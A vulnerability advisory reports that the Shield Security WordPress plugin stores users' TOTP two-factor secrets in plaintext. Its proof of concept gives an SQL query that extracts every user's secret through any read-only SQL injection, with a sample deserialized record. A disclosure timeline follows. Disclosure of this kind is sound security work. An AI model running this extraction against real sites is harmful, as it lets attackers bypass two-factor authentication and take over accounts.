| Affected plugin | Shield Security |
| Active installs | 60,000+ |
| Vulnerable version | <= 16.1.6 |
| Audited version | 16.1..1 |
| Fully patched version | – |
| Recommended remediation | Removal of the plugin |
Description
The plugin stores users’ TOTP secrets as plaintext in the database.
An attacker that can obtain one of the seemingly never-ending read-only SQL-Injections will be able to bypass all 2FA checks for all users indefinitely.
Proof of concept
The following code is used to retrieve TOTP secrets from the “wp_usermeta” table:
protected function getSecret() {
$secret = $this->getCon()->getUserMeta( $this->getUser() )->{static::SLUG.'_secret'};
return empty( $secret ) ? static::DEFAULT_SECRET : $secret;
}* “static::SLUG” is equal to “(string) ga”.
An attacker can obtain all TOTP secrets through his read-only SQLi by running the following query.
SELECT user_id, meta_value FROM wp_usermeta WHERE meta_key = 'icwp-wpsf-meta'Each record is a serialized PHP array that contains all user meta for one user.
After deserializing the records using PHP’s unserialize function, each record has a “ga_secret” key which is the user’s TOTP secret.
a:8:{s:6:"prefix";s:9:"icwp-wpsf";s:7:"user_id";i:1;s:9:"pass_hash";s:4:"266b";s:5:"tours";a:2:{s:12:"dashboard_v1";i:1662922763;s:13:"navigation_v1";i:1662923128;}s:9:"ga_secret";s:16:"TJD7I4OXNQNPU3RD";s:12:"ga_validated";b:1;s:13:"login_intents";a:1:{s:10:"160ede8d07";a:2:{s:5:"start";i:1662982530;s:8:"attempts";i:0;}}s:9:"flash_msg";N;}==> ga_secret: TJD7I4OXNQNPU3RD
Timeline
| Vendor contacted | September 12, 2022 |
| First Response | September 12, 2022 |
| Fully patched at | – |
| Publicly disclosed | April 24, 2023 |
Leave a Reply